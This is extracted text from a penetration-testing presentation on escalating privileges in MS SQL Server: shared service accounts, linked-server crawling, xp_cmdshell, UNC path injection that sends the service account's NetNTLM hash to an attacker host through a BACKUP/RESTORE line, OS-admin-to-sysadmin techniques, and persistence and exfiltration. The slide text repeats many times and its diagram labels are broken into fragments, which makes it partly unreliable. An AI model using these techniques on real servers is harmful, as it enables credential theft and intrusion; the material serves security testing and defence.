1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
EscalatingPrivileges
Shared Service Accounts
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
